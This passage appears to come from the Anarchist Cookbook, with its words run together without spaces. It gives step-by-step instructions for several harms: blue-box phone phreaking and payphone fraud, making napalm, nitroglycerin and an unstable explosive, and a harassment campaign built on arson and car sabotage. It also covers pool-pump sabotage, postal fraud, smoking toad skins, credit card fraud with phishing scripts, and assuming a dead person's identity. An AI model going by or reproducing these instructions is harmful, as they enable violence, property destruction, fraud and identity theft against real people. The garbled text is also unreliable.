ThetimingofalltheMFsignalsisanominal60ms,exceptforKP,whichshould haveadurationof100ms.Thereshouldalsobea60mssilentperiodbetween digits.Thisisveryflexiblehowever,andmostBellequipmentwillaccept outrageoustimings.Inadditiontothestandarduseslistedabove,MFpulsing alsohasexpandedusagesknownas"expandedinbandsignaling"thatincludesuch thingsascoincollect,coinreturn,ringback,operatorattached,andoperator attached,andoperatorreleased.KP2,code11,andcode12andtheST_ps(STart "primes"allhavespecialuseswhichwillbementionedonlybrieflyhere.To completeacallusingablueboxonceseizureofatrunkhasbeenaccomplished bysending2600Hzandpausingforthe,onemustfirstsendaKP.Thisreadies theregisterforthedigitsthatfollow.Forastandarddomesticcall,theKP wouldbefollowedbyeither7digits(ifthecallwereinthesameNPAasthe seizedtrunk)or10digits(ifthecallwerenotinthesameNPAastheseized trunk).[Exactlylikedialingnormalfonecall].FollowingeithertheKPand7 or10digits,aSTartissenttosignifythatnomoredigitsfollow.Exampleof acompletecall: 1. 2. 3. 4. 5. Dial18062581234 Waitforacallprogressindication(suchasring,busy,recording,etc.) Send2600Hzforabout1second. Waitforaboutllprogressindication(suchasring,busy,recording,etc.) SendKP+305+994+9966+ST

Thecallwillthenconnectifeverythingwasdoneproperly.Notethatifacall toan806numberwerebeingplacedinthesamesituation,thearecodewouldbe omittedandonlyKP+sevendigits+STwouldbesent.Code11andcode12are usedininternationalcallingtorequestcertaintypesofoperators.KP2isused ininternationalcallingtorouteacallotherthanbywayofthenormalroute, whetherforeconomicorequipmentreasons.STp,ST2p,andST3p(prime,two prime,andthreeprime)areusedinTSPSsignalingtoindicatecallingtypeof call(suchascoindirectdialing. 78.NapalmIIbyTheJollyRoger [Seefile#021oftheCookbookforaneasywaytomakeit!!] Aboutthebestfirebombisnapalm.Ithasathickconsistency,likejamandis bestforuseonvehiclesorbuildings.Napalmsissimplyonepartgasolineand onepartsoap.Thesoapiseithersoapflakesorshreddedbarsoap.Detergents won'tdo.Thegasolinemustbeheatedinorderforthesoaptomelt.Theusual wayiswithadoubleboilerwherethetopparthasatleastatwoquart capacity.Thewaterinthebottompartisbroughttoaboilandthedouble boileristakenfromthestoveandcarriedtowherethereisnoflame.Thenone part,byvolume,ofgasolineisputinthetoppartandallowedtoheatasmuch asitwillandthesoapisaddedandthemessisstirreduntilitthickens.A betterwaytoheatgasolineistofillabathtubwithwaterashotasyoucan getit.Itwillholditsheatlongerandpermitamuchlargercontainerthan willthedoubleboiler. 79.NitroglycerinRecipebyTheJollyRoger LikeallchemistsImustadviseyoualltotakethegreatestcareandcaution whenyouaredoingthis.Evenifyouhavemadethisstuffbefore.Thisfirst articlewillgiveyouinformationonmakingnitroglycerin,thebasicingredient inalotofexplosivessuchasstraightdynamites,andgelatindynamites.

Makingnitroglycerin: 1. Filla75milliliterbeakertothe13mL.Levelwithfumingrednitric acid,of98%pureconcentration. 2. Placethebeakerinanicebathandallowtocoolbelowroomtemp. 3. Afterithascooled,addtoitthreetimestheamountoffumingsulferic acid(99%h2so4).Inotherwords,addtothenowcoolfumingnitricacid39mL. Offumingsulfericacid.Whenmixinganyacids,alwaysdoitslowlyand carefullytoavoidsplattering. 4. Whenthetwoaremixed,lowertheirtemp.Byaddingmoreicetothebath, about1015C.(Useamercuryoperatedthermometer) 5. Whentheacidsolutionhascooledtothedesiredtemperature,itisready fortheglycerin.Theglycerinmustbeaddedinsmallamountsusingamedicine dropper.(Readthisstepabout10times!)Glycerinisaddedslowlyand carefully(Imeancareful!)Untiltheentiresurfaceoftheaciditcoveredwith it. 6. Thisisadangerouspointsincethenitrationwilltakeplaceassoonas theglycerinisadded.Thenitrationwillproduceheat,sothesolutionmustbe keptbelow30C!Ifthesolutionshouldgoabove30C,immediatelydumpthe solutionintotheicebath!Thiswillinsurethatitdoesnotgooffinyour face! 7. Forthefirsttenminutesofnitration,themixtureshouldbegently stirred.Inanormalreactionthenitroglycerinwillformasalayerontopof theacidsolution,whilethesulfericacidwillabsorbtheexcesswater. 8. Afterthenitrationhastakenplace,andthenitroglycerinhasformedon thetopofthesolution,theentirebeakershouldbetransferredslowlyand carefullytoanotherbeakerofwater.Whenthisisdonethenitroglycerinwill settleatthebottomsotheotheracidscanbedrainedaway. 9. Afterremovingasmuchacidaspossiblewithoutdisturbingthe nitroglycerin,removethenitroglycerinwithaneyedropperandplaceitina bicarbonateofsoda(sodiumbicarbonateincaseyoudidn'tknow)solution.The sodiumisanalkaliandwillneutralizemuchoftheacidremaining.Thisprocess shouldberepeatedasmuchasnecessaryusingbluelitmuspapertocheckforthe presenceofacid.Theremainingacidonlymakesthenitroglycerinmoreunstable thanitalreadyis. 10. Finally!Thefinalstepistoremovethenitroglycerinfromthe bicarbonate.Hisisdonewithandeyedropper,slowlyandcarefully.Theusual testtoseeifnitrationhasbeensuccessfulistoplaceonedropofthe nitroglycerinonmetalandigniteit.Ifitistruenitroglycerinitwillburn withaclearblueflame. **Caution** Nitroisverysensitivetodecomposition,heatingdropping,orjarring,andmay explodeifleftundisturbedandcool. 80.Operation:FuckupbyTheJollyRoger ThisisaguideforAnarchistsandcanbefunnyfornonbelieversand12and13 yearoldrunts,andcanbealexiconofdeadlyknowledgeforTrueAnarchists... Seriousdamageisintendedtobedealthere.Donottrythisstuffunlessyou wanttodoalotofseriousAnarchy. [Simulation] Asshole'Listen,youlittleteenagerpunkshit,shutthefuckup,orI'll knockyoudown!' Anarchist'O.K.Youcan'tsayIdidn'twarnyou.Youdon'tknowmyrue power...'(soooocasually) Asshole'Well,er,whatdoyoumean? Anarchist''Asyoucansee,theAnarchistknowssomethingthatthisasshole doesn't...

[OperationFuckup] Getawheelbarrelortwo.Fillwithgasoline.Get16rollsoftoiletpaper, unroll&drenchinthegasoline.Riptoshredsingasoline.Getasbestosgloves. Lightaflare(tobepunk),grabglobofsaturatedtoiletpaper(youcanignite theglobornot).Throweitherflamingordrippingglobinto: Anywindow(pictureisthebest) Frontdoors Roughgrainsiding Bestofall,brickwalls

Firstofall,thisbitchisnearimpossibletogetoffoncedried,andisa terrortopeopleinsidewhenlit!Afterthis...duringthenight,getapickup truck,afewwheelbarrels,andadozenfriendswithshovels.Thepickupcanbe usedonlyfortransportingpeopleandequipment,ordoingthat,andcartingall thedirt.Whenitgetsaround12:00(afterthelosergoesbeddiebye),diga gargantuanholeinhisfrontyarduntilabout3:00.Youcaneitherassignthree orfourofyourfriendstocartthedirttenmilesawayinthepickupbed,or buryhisfrontdoorin15'ofdirt!Afterthatisdone,getthreeorfour bucketsoftar,andcoathiswindows.Youcanmakeanaddedtwistbyigniting thetarwhenyouarealldoneandreadytorun!Thatisiftheloserhasa house.Ifhelivesinsideanapartmentbuilding,youmustdirecttheattackmore towardhiscar,andfrontdoor.Iusuallystartoutwhenhegoestowork...I findoutwhathischeapcarlookslike,andmemorizeitforfutureabuse...Itis alwaysfuntopainthisfrontdoor(apt.)hotpinkwithpurplepolkadots,and offneoncolorsindiagonalstripes.Youcanalsopoundafewhundredorsofour inchnailsintohisfrontdoor(thislookslikesomebodyreallydoesn'tlikeyou fromtheinside).Anothergreatistofillhiskeyholewithliquidsteelsothat afterthebastardcloseshisdoortheonlywaytogetbackinistobreakit down.Ifyoucanspareit,leavehimanaxethatis,implantedthreeinches into,andthroughthedoor!Now,thisnextoneisdifficult,butoneofthe best!Getapieceofwoodsidingthatwillmorethancoverhisfrontdoor completely.Nailtwobyfoursontheedgesofthesiding(allexceptthebottom) soyouhaveabargelikecontraption.Makeaholeatthetopthatwillbe largeenoughforacementslide.MixaboutsixorsevenLARGEbagsofQUICK dryingcement.Usethecementslidetofilltheantechambercreatedbythe 'barge'thatisaroundhisdoor.Usemoretwobyfourstobraceyourlittle cementfilledbarge,andletthelittlegemdry.Whenitis,removethe'barge' soonlyastonemonolithremainsthatcovershisdoor.Useanyremainingcement tomakeabasearoundthissohecan'tjustpushitover.WhenIdidthis,he calledthefiredepartment,andtheythoughthemeantwood,sotheybrought axes.Iwatchedwithafewdozenorsoothertenants,andlaughedmydamnass off!Thisisonlyhisdoor!Afterheparkshiscarforthenight,thefunreally begins...Istartoutbyopeningupthecarbyjammingaverythin,butloack insideandout!Thenproceedtoputorangejuicesyrupallovertheseats,so afterhegetsthroughalltheothershitthatyoudo,hewillhavethestickiest seatsintheworld.YoucanthengetafewSundaypapers,andcrackoneofthe windowsaboutfourinches.Lightlycrumplethepapers,andcontinueto completelyfilltheinsideofhiscarwiththenewspapers.AcopyoftheSunday NewYorkTimeswillnicelyfillaVolkswagen!Whatisalsoquiteamusingisto puthiscaroncinderblocks,slashhistiresatthetop,andfillthemwith cement!Leavethecinderblockstheresothat,afterheknocksthecaroffof them,hewillgetabout3milestothegallonwiththosetires,anddo0to60 inabouttwominutes!Itisevenmorehilariouswhenhedoesn'tknowwhythe hellwhy!Anotheristoopenhishood,andthenrunafewwiresfromthe sparkplugstotheMETALbody.ThesureisoneHOTcarwhenitisrunning!Now,I liketopourtwopoundsofsugardownhisgastank.Ifthisdoesn'tblowevery gasketinhisengineitwilldosomethingcalled'caramelizinghisengine'.This iswhentheextremeheatturnsthesugartocaramel,andyouliterallymust completelytaketheengineoutandapart,andcleaneachandeveryindividual part!Well,ifthisassholedoesnotgetthemessage,youhadbetterstartto getserious.Ifthisguidewasusedproperly&asitwasintended(no,notas

kindlingforthefire),thisassholewilleithermovefaraway,seek professionalpsychologicalhelp,commitsuicide,oralloftheabove! 81.StealingcallsfrompayphonesbyTheJollyRoger Nowtomakefreelocalcalls,youneedafinishingnail.Ihighlyrecommend"6D E.G.FINISHC/H,2INCH"nails.Theseareabout3/32ofaninchindiameterand 2incheslong(ofcourse).Youalsoneedalargesizepaperclip.BylargeI meantheyareabout2inlong(FOLDED).Thenyouunfoldthepaperclip.Unfoldit bytakingeachpieceandmovingitout90.Whenitisdoneitshouldlook somewhatlikethis: /\ :: :: :: :: \ Now,ontotheneatstuff.Whatyoudo,insteadofunscrewingthegluedon mouthpiece,isinsertthenailintothecenterholeofthemouthpiece (whereyoutalk)andpushitinwithpressureorjusthammeritinbyhitting thenailonsomething.JustDON'TKILLTHEMOUTHPIECE!Youcoulddamageit ifyouinsertthenailtoofaroratsomeweirdangle.Ifthishappensthen theotherpartywon'tbeabletohearwhatyousay.Younowhaveaholeinthe mouthpieceinwhichyoucaneasilyinsertthepaperclip.So,takeoutthenail andputinthepaperclip.Thentaketheotherendofthepaperclipandshove itundertherubbercordprotectoratthebottomofthehandset(youknow,the blueguy...).Thisshouldenduplookingremotelylike...likethis: /\Mouthpiece :: Paperclip>::/ :/:\ ::: :> ====================\))): :Toearpiece> ^^ \> :: :: CordBlueguy (Thepaperclipisshovedundertheblueguytomakeagoodconnection betweentheinsideofthemouthpieceandthemetalcord.)Now,dialthenumber ofalocalnumberyouwishtocall,sayyyy,MCI.Ifeverythinggoesokay,it shouldringandnotanswerwiththe"TheCallYouHaveMadeRequiresa20Cent Deposit"recording.Aftertheotherendanswersthephone,removethepaper clip.It'sallthatsimple,see?Thereareacoupleproblems,however. Oneis,asImentionedearlier,themouthpiecenotworkingafteryoupunch it.Ifthishappenstoyou,simplymoveontothenextpayphone.Theoneyou arenowonislost.Anotherproblemisthatthetouchtoneswon'tworkwhen thepaperclipisinthemouthpiece.Therearetwowaysaroundthis.. 1. Dialthefirst6numbers.Thisshouldbedonewithoutthepaperclip makingtheconnection,i.e.,onesideshouldnotbeconnected.Thenconnectthe paperclip,holddownthelastdigit,andslowlypullthepaperclipoutat themouthpiece'send. 2. Don'tusethepaperclipatall.Keepthenailinafteryoupunch

it.Dialthefirst6digits.Beforedialingthelastdigit,touchthenail headtotheplateonthemainbodyofthephone,themoneysafethingy..then pressthelastnumber.Thereasonthatthismethodissometimescalledclear boxingisbecausethereisanothertypeofphonewhichletsyouactuallymake thecallandlistentothemsay"Hello,hello?"butitcutsoffthe mouthpiecesotheycan'thearyou.TheClearBoxisusedonthattoamplify yourvoicesignalsandsenditthroughtheearpiece.Ifyouseehowthisis evenslightlysimilartothemethodIhavejustdescribedupthere,kindly explainittoME!!CauseIdon'tGETIT!Anyways,thisDOESworkonalmostall singleslot,DialToneFirstpayphones(PacificBellforsure).Idoitallthe time.Thisistheleast,ISTRESS*LEAST*,riskyformofPhreaking. 82.PoolFunbyTheJollyRoger Firstofall,youneedknownothingaboutpools.Theonlythingyouneedknow iswhatapoolfilterlookslike.Ifyoudon'tknowthat.Second,dresscasual. Preferably,inblack.Visityour"friends"house,theonewhosepoollookslike fun!!Thenyoureversethepolarityofhis/herpool,byswitchingthewires around.Theyarelocatedinthebackofthepump.Thiswillhavequiteaneffect whenthepumpgoeson.Inotherwords.Boooooooooooommm!That'sright,whenyou mix+wireswithplugs,andviceversa,the4thofJulyhappensagain.Not intototaldestruction???Whenthepumpisoff,switchthepumpto"backwash". Turnthepumponandgetthephuckout!Whenyoulookthenextday,phunny. Thepoolisdry.Ifyouwantpermanentdamage,yetnogreatdisplaylikemy firstonementioned,shutthevalvesofthepooloff.(Thereareusually2)One thatgoestothemaindrainandonethatgoestothefilterinthepool.That shouldbeenoughtohaveonedeadpump.Thepumpmusttakeinwater,sowhen thereisn'tany...Practicaljokes:thesenextonesdealwithtruefriendsand thereis*no*permanentdamagedone.Ifyouhaveapool,youmustcheckthe poolwithchemicals.Thereisonelabeledorthotolidine.Theotherislabeled alkaline(pH).Youwantorthotolidine.(Itchecksthechlorine).Gotoyour localpoolstoreandtellthemyou'regoingintothepoolbusiness,andtosell youorthotolidine(aCLdetector)Buythisingreatquantitiesifpossible. Thesolutionisclear.Youfill2baggieswiththischemical.Andsewthebags totheinsideofyoursuit.Next,goswimmingwithyourfriend!Thenopenthe bagsandlooklikeyou'reenjoyingapiss.Andanyonetherewillturnadeep red!Theywillbeembarrassedsomuch,Especiallyiftheyhavegueststhere! Explainwhatitis,thenaddvinegartothepool.Onlyalittle.The"piss" disappears. 83.FreePostagebyTheJollyRoger Theincreasingcostofpostagetomaillettersandpackagesisbringingdownour standardofliving.Toremedythisdeplorablesituation,somecountercontrol measurescanbeapplied.Forexample,ifthestampsonaletterarecoatedwith Elmer'sGluebythesender,thecancellationmarkwillnotdestroythestamp: theElmer'sdrivestoformanalmostinvisiblecoatingthatprotectsthestamps fromthecancellationink.Later,thereceiverofthelettercanremovethe cancellationmarkwithwaterandreusethestamps.Furthermore,ecological savingwillalsoresultfromrecyclingthestamps.Helpsaveatree.Theglueis mostefficientlyappliedwithabrushwithstiff,shortbristles.Justdipthe brushdirectlyintotheglueandspreaditonevenly,coveringtheentire surfaceofthestamp.Itwilldryinabout15minutes.Formailingpackages, justfollowthesameprocedureasoutlinedabove;however,thepackageshouldbe weighedandcheckedtomakesurethatithasthecorrectamountofpostageonit beforeitistakentothePostOffice.Removingthecancellationandtheglue fromthestampscanbeeasilyaccomplishedbysoakingthestampsinwarmwater untiltheyfloatfreefromthepaper.Thestampscanthenbeputontoapaper toweltodry.Processingstampsinlargebatchessavestimetoo.Also,itmay behelpfultowritetheword'Elmer'atthetopoftheletter(notonthe

envelope)tocuethereceivingpartyinthatthestampshavebeenprotectedwith theglue.Weallknowthatmailingpackagescanbeexpensive.Andwealsoknow thatthehandicappedaresometimesdiscriminatedagainstinjobs.The Government,beingthegenerouspeopletheyare,havegiventheblindfreepostal service.Simplyaddressyouenvelopeasusual,andmakeonemodification.Inthe cornerwherethestampwouldgo,writein(orstamp)thewords'FREEMATTERFOR THEBLIND".Thendropyoupackageorletterinoneofthebluefederal mailboxes.DONOTTAKETHELETTERTOTHEPOSTOFFICE,ORLEAVEITINYOUR MAILBOX.Soundsveryniceofthegovernmenttodothis,right?Well,they aren'tthatnice.Theparcelissentlibraryrate,thatisbelowthirdclass. Itmaytakefourtofivedaystosendalettertojustthenexttown.Thistoo isquitesimple,butlesseffective.Puttheaddressthatyouaresendingthe lettertoasthereturnaddress.Ifyouweresendinga$20donationtothe pirate'sChest,youwouldputouraddress(PObox644,LincolnMA01773)asthe returnaddress.Thenyouwouldhavetobecarelessandforgettoputthestamp ontheenvelope.Anicetouchistoputabullshitaddressinthecenterofthe envelope.Again,youMUSTdroptheletterinaFEDERALmailbox.Ifthepost officedoesn'tsendthelettertothereturnaddressforhavingnostamp,they willsenditbackforthereasonof"Nosuchaddress". Example: PiratesChestDept.40DD P.O.Box644865 Lincol,Ma.41773 TomBullshit 20FakeRoad WhatEver,XX99851 Onelastthingyoumighttrydoingissoakingacanceledstampoffofan envelope,andgluingitontooneyouaresending.Thenburnthestamp,leavinga littlebittoshowthattherewasonethere. 84.UnstableExplosivesbyTheJollyRoger MixsolidNitricIodinewithhouseholdammonia.Waitovernightandthenpouroff theliquid.Youwillbeleftwithamuddysubstance.Letthisdrytillit hardens.Nowthrowitatsomething!!!! 85.WeirdDrugsbyTheJollyRoger Bananas: 1. Obtain15poundsofripeyellowbananas. 2. Peelallandeatthefruit.Savethepeelings. 3. Scrapealltheinsidesofthepeelswithasharpknife. 4. Putallthescrapedmaterialinalargepotandaddwater. 5. Boil3or4hoursuntilithasattainedasolidpasteconsistency. 6. Spreadpasteontocookiesheetsanddryinovenforabout20minutes.This willresultinfineblackpowder.Usuallyonewillfeeltheeffectsafter smokingthreetofourcigarettes. Coughsyrup: MixRobitussionACwithanequalamountofgingeraleanddrink.Theeffectare sedationandeuphoria.Neverunderestimatetheeffectsofanydrug!YoucanOD oncoughsyrup! Toads: 1. Collectfivetotentoads,frogswillnotwork.Thebestkindaretree toads.

2. Killthemaspainlesslyaspossible,andskinimmediately. 3. Allowtheskinstodryinarefrigeratorfourtofivedays,oruntilthe skinsarebrittle. 4. Nowcrushtheskinsintopowderandsmoke.Duetoitsbadtasteyoucan mixitwithamorefragrantsmokingmedium. Nutmeg: 1. Takeseveralwholenutmegsandgrindthemupinanoldgrinder. 2. Afterthenutmegsareground.Placeinamortarandpulverizewitha pestle. 3. Theusualdosageisabout10or15grams.Alargerdosemayproduce excessivethirst,anxiety,andrapidheartbeat,buthallucinationsarerare. Peanuts: 1. Take1poundofrawpeanuts(notroasted.) 2. Shellthem,savingtheskinsanddiscardingtheshells. 3. Eatthenuts. 4. Grinduptheskinsandsmokethem. 86.TheArtofCardingbyTheJollyRoger Obtainingacreditcardnumber:Therearemanywaystoobtaintheinformation neededtocardsomething.Themostimportantthingsneededarethecardnumber andtheexpirationdate.Havingthecardholdersnamedoesn'thurt,butitis notessential.Theabsolutebestwaytoobtainalltheinformationneededisby trashing.Thewaythisisdoneissimple.Youwalkaroundyourareaorany otherareaandfindastore,mall,supermarket,etc.,thatthrowstheirgarbage outsideonthesidewalkordumpster.Ripthebagopenandseeifyoucanfind anycarbonsatall.Ifyoufindlittleshredsofcreditcardcarbons,thenit ismostlikelynotworthyourtimetotapetogether.Findastorethatdoesnot riptheircarbonsatalloronlyinhalf.Anotherwayistobullshitthenumber outofsomeone.Thatiscallthemupandsay"Hello,thisisVisasecurityand wehaveareportthatyourcardwasstolen."Theywilldenyitandyouwilltry togetitoutofthemfromthatpointon.Youcouldsay,"Itwasn'tstolen? Wellwhatistheexpirationdateandmaybewecanfixtheproblem....OKand whatisthenumberonyourcard?......Thankyouverymuchandhaveaniceday." Orthinkofsomethingtothatdegree.Anotherwaytogetcardnumbersisthrough systemssuchasTRWandCBI,thisisthehardway,andprobablynotworththe trouble,unlessyouareanexpertonthesystem.Usingcreditcardnumbers postedonBBS'sisrisky.Theonlyadvantageisthatthereisagoodchance thatotherpeoplewilluseit,thusdecreasingthechancesofbeingthesole offender.Thelastmethodofgettingnumbersisverygoodalso.Inmostvideo rentalstores,theytakedownyourcreditcardnumberwhenyoujointobackup yourrentals.Soifyoucouldmanagetostealthelistormakeacopyofit, thenyouaresetforaLONGtime.Choosingavictim:Onceyouhavethecard number,itistimetomaketheorder.Thetypeofplacesthatareeasiestto victimizearesmallbusinessesthatdomailorderorevenlocalstoresthat deliver.Ifyouhaveanadforaplacewithsomethingyouwantandtheorder numberisNOTa1800numberthenchancesarebetterthatyouwillsucceed. Ordering Whenyoucalltheplaceuptomaketheorder,youmusthaveseveralthings readilyathand.Thesearethethingsyouwillneed:Aname,telephonenumber, businessphone,cardnumber(4digitbankcodeifthecardisMasterCard), expirationdate,andacompleteshippingandbillingaddress.Iwilltalkabout alloftheseindetail.Apersonaltip:WhenIcalltomakeanorder,itusually goesmuchsmootherifthepersonyouaretalkingtoisawoman.Inmanycases theyaremoregulliblethanmen.Thename:Youcouldusethenameonthecard orthenameofthepersonwhoyouaregoingtosendthemerchandiseto.Oryou couldusethenameonthecardandhaveitshippedtothepersonwholivesat thedrop(Sayitisagiftorsomething).Thenameisreallynotthatimportant

becausewhenthecompanyverifiesthecard,thepersonsnameisnevermentioned, EXCEPTwhenyouhaveaPreferredVisacard.Thenthenameismentioned.You cantellifyouhaveaPreferredVisacardbythePVtotherightofthe expirationdateonthecarbon.Nophonealldaylongwaitingforthecompanyto call(Whichtheywill),thenthephonenumbertogivethemasyourhomephone couldbeoneofthefollowing:AnumberthatisALWAYSbusy,anumberthat ALWAYSrings,apayphonenumber,lowendofaloop(andyouwillwaitonthe otherend),orapopularBBS.NEVERgivethemyourhomephonebecausetheywill findoutassoonastheinvestigationstartswhothephonebelongsto.Thebest thingwouldbetohaveapayphonecallforwardyourhouse(viaCosmThebusiness number.)Whenaskedfor,repeatthenumberyouusedforyourhomephone.Card number:ThecardsyouwillusewillbeVisa,Mastercard,andAmericanExpress. ThebestisbyfarVisa.Itisthemoststraightforward.Mastercardispretty coolexceptforthebankcode.Whentheyaskforthebankcode,theysometimes alsoaskforthebankthatissuedit.Whentheyaskthatjustsaythebiggest bankyouknowofinyourarea.TrytoavoidAmericanExpress.Theytendtolead fullscaleinvestigations.Unfortunately,AmericanExpressisthemostpopular cardout.Whentellingthepersonwhoistakingyourcallthecardnumber,say itslow,clear,andwithconfidence.e.g.CC#is5217123456789012.Pause aftereachsetoffoursoyoudon'thavetorepeatit.Expirationdate:Thedate mustbeatLEASTinthatmonth.Itisbesttowithmorethanthreemonthsto go.Theaddress:Morecommonlyreferredtoasthe'drop'.Wellthedropcan rangefromanabandonedbuildingtoyournextdoorneighborsapartment.Ifyou plantosendittoanapartmentbuildingthenbesureNOTtoincludean apartmentnumber.ThiswillconfuseUPSorpostagemenalittleandtheywill leavethepackageinthelobby.Hereisalistofvariousdrops:Thehousenext doorwhosefamilyisonvacation,theapartmentthatwasjustmovedoutof,the oldchurchthatwillbeknockeddowninsixmonths,yourfriendshousewhohas absolutelynothingtodowiththetypeofmerchandiseyouwillbuyandwhowill alsonotcrackunderheatfromfeds,etc..Therearealsoservicesthathold merchandiseforyou,butpersonallyIwouldnottrustthem.Andforgetabout P.O.BoxesbecauseyouneedIDtogetoneandmostplacesdon'tshiptothem anyway.Otheraspectsofcarding:Verifyingcards,seeingiftheywerereported stolen.Verifyingcards:Storesneedtoverifycreditcardswhensomeone purchasessomethingwithone.Theycallupaservicethatcheckstoseeifthe customerhasthemoneyinthebank.Themerchantidentifieshimselfwitha merchantnumber.Theservicethenholdsthemoneythatthemerchantverifiedon reserve.Whenthemerchantsendsinthecreditcardform,theservicesendsthe merchantthemoney.Theserviceholdsthemoneyforthreedaysandifnoform appearsthenitisputbackintothebank.Thepointisthatifyouwantto verifysomethingthenyoushouldverifyitforalittleamountandoddsarethat therewillbemoreinthebank.Thegoodthingaboutverificationisthatifthe carddoesn'texistorifitisstolenthentheservicewilltellyou.Toverify MasterCardandVisatrythisnumber.Itisvoice:18003271111merchantcode is596719.Stolencards:MastercardandVisacomeoutwithasmallcatalogevery weekwheretheypublishEVERYstolenorfraudulentlyusedcard.Igetthisevery weekbytrashingthesameplaceonthesameday.Ifyoueverfindittrashing thentrytogetiteveryweek.Identifyingcards:Visacardnumbersbeginwitha 4andhaveeither13or16digits.MasterCardcardnumbersbeginwitha5and have16digits.AmericanExpressbeginswitha3andhas15digits.Theyall havetheformatsofthefollowing: 3xxxxxxxxxxxxxxAmericanExpress 4xxxxxxxxxxxxVisa 4xxxxxxxxxxxxxxxVisa 5xxxxxxxxxxxxxxxMasterCard Goldcards:Agoldcardsimplymeansthatcreditisgoodfor$5000.Withouta goldcard,creditwouldbenormally$2000.Torecognizeagoldcardonacarbon thereareseveraltechniques: AmericanExpressnone. VisaPVinsteadofCV.

NoteWhenverifyingaPVVisa,youhavetohavetherealnameofthecardholder. MastercardAnasteriskcansignifyagoldcard,butthischangesdependingwhen thecardwasissued.Iamgoingtotypeoutadialogbetweenacarderandthe phoneoperatortohelpyougettheidea. Operator:"OverpricedComputerGoods,mayIhelpyou?" Carder:"Hi,Iwouldliketoplaceanorderplease." Operator:"Sure,whatwouldyouliketoorder?" Carder:"400genericdisksandadoubledensitydrive." Operator:"Ok,isthereanythingelse?" Carder:"Nothankyou,that'sallfortoday." Operator:"Ok,howwouldyouliketopayforthis?MasterCardorVisa?" Carder:"Visa." Operator:"Andyournameis?" Carder:"LennyLipshitz."(Nameoncard) Operator:"AndyourVisacardnumberis?" Carder:"4240419001340"(Invalidcard) Operator:"Expirationdate?" Carder:"0692." Operator:"Andwherewouldyoulikethepackageshippedto?" Carder:"6732GoatsgatePort.Paris,Texas,010166." Operator:"Andwhatisyourhometelephonenumber?" Carder:"2127249970"(Thisnumberisactuallyalwaysbusy) Operator:"Iwillalsoneedyourbusinessphonenumberincasewehavetoreach you." Carder:"Youcanreachmeatthesamenumber.2127249970" Operator:"O.K.Thankyouverymuchandhaveniceday." Carder:"Excuseme,whenwillthepackagearrive?" Operator:"InsixtosevendaysUPS." Carder:"Thanksalot,andhaveapleasantday." Nowyouwait67dayswhenthepackagewillarrivetotheaddresswhichis reallyahouseupforsale.Therewillbeanoteonthedoorsaying,"Hello UPS,pleaseleaveallpackagesforLennyLipshitzinthelobbyorporch.Thanks alot,LennyLipshitz"(Makethesignaturehalfwayconvincing) 87.RecognizingcreditcardsbyTheJollyRoger [Sample:AmericanExpress] XXXXXXXXXXXXXXX MM/Y1THRUMM/Y2Y1 JohnDoeAX Explanation: Thefirstdateisthedatethepersongotthecard,theseconddateisthe expirationdate,aftertheexpirationdateisthesamedigitsinthefirstyear. TheAmericanExpressGoldhasmanymorenumbers(Ithink68then8).Ifyoudo findaGoldcardkeepitforithasa$5000.00backupevenwhentheguyhasno money! [Sample:MasterCard] 5XXXXXXXXXXXXXXX XXXXAAADDMMYYMM/YY JohnDoe. Explanation: Theformatvaries,Ihaveneverseenacardthatdidnotstartwitha5XXXthere isanother4digitsonthenextlinethatissometimesaskedforwhenordering stuff,(andrarelya3digitlettercombo(e.ANB).Thefirstdateisthedate thepersongotthecardandtheseconddateistheexpirationdate.MasterCard

isalmostalwaysacceptedatstores. [Sample:VISA] XXXXXXX(X)XXX(X)XXX(X) MM/YYMM/YY*VISA JohnDoe Explanation: Visaisthemoststraightforwardofthecards,forithasthenamerightonthe carditself,againthefirstdateisthedatehegotthecardandthesecondis theexpirationdate.(Sometimesthefirstdateisleftout).Thenumberscan eitherbe4333or4444.Visaisalsoalmostalwaysacceptedatstores, therefore,thebestofcardstouse. 88.HowToCreateANewIdentitybyTheWalkingGlitch Youmightbesaying,"HeyGlitch,whatdoIneedanewidentityfor?"Theanswer issimple.Youmightwanttogobuyliquorsomewhere,right?Youmightwantto gogivethecopsthefalsenamewhenyougetbustedsoyoukeepyourgoodname, eh?YoumightevenwanttousethenewidentityforgettingaP.O.Boxfor carding.Sure!YoumightevenwantthestuffforrentingyourselfaVCRatsome dicklessloserofaconveniencestore.Herewego:GettinganewIDisn'talways easy,noonesaiditwouldbe.Byfollowingthesesteps,anybozocanbecomea newbozoinacoupleofweeks. STEP1 Thefirststepistofindoutwhoexactlyyou'llbecome.Themostsecurewayis tousesomeone'sIDwhodoesn'tuseitthemselves.Thepeoplewhofitthatbill thebestaredead.Asanaddedbonustheydon'tgocomplainingonebit.Goto thelibraryandlookthrougholddeathnotices.Youhavetofindsomeonewhowas bornaboutthesametimeasyouwere,orbetteryet,ayearortwooldersoyou canbuybooze,etc.Youshouldgobackasfarasyoucanforthedeathbecause moststatesnowcrossindexdeathstobirthssopeoplecan'tdothisinthe future.ThecutoffdateinWisconsinis1979,folksinthisgrandstategotta lookin1978orearlier.Anythingearlierthereiscool.Now,thisisthe hardestpartifyou'reyounger.Bratsthatyounghappentobequiteresilient, takingfallsoutofthreestorywindowsandeatingratpoisonlikeitsEaster candy,andnotascratchordent.Thereain'tmanythatdie,soyagottalook yourassoff.Godowntothelibraryandlookupallthedeathnoticesyoucan, ifit'sonmicrofilmsomuchthebetter.Youmighthavetogothroughmonthsof deathnoticesthough,buttheresultsarewellworthit.Yougottagetsomeone whodiedlocallyinmostinstances:thedeathcertificateisfiledonlyinthe countyofdeath.Nowyougodowntothecountycourthouseinthecountywherehe diedandgetthedeathcertificate,thiswillcostyouaround$3$5dependingon thestateyou'rein.Lookatthishunkofpaper,itcouldbeyourwaytovanish inacloudofsmokewhentherighttimecomes,likerightafterthatbigscam. IfYou'relucky,theslobsparentssignedhimupwithsocialsecuritywhenhe wasasnotnosedbrat.That'llbeanotherpieceofIDyoucanget.Ifnot, that'sOktoo.It'llbelistedonthedeathcertificateifhehasone.Ifyou're lucky,thestiffwasbornlocallyandyoucangethisbirthcertificateright away. STEP2 Nowchecktheplaceofbirthonthedeathcertificate,ifit'sinthesameplace youstandingnowyou'reallset.Ifnot,youcanmailawayforonefromthat countybutitsaminorpainanditmighttakeawhiletoget,thelibrarianat thedeskhaslistingsofwheretowriteforthisstuffandexactlyhowmuchit costs.GettheBirthcertificate,itsworththeextramoneytogetitcertified becausethat'stheonlywaysomepeoplewillacceptitforID.Whenyou're gettingthisstuffthelittleformsaskforthereasonyouwantit,insteadof

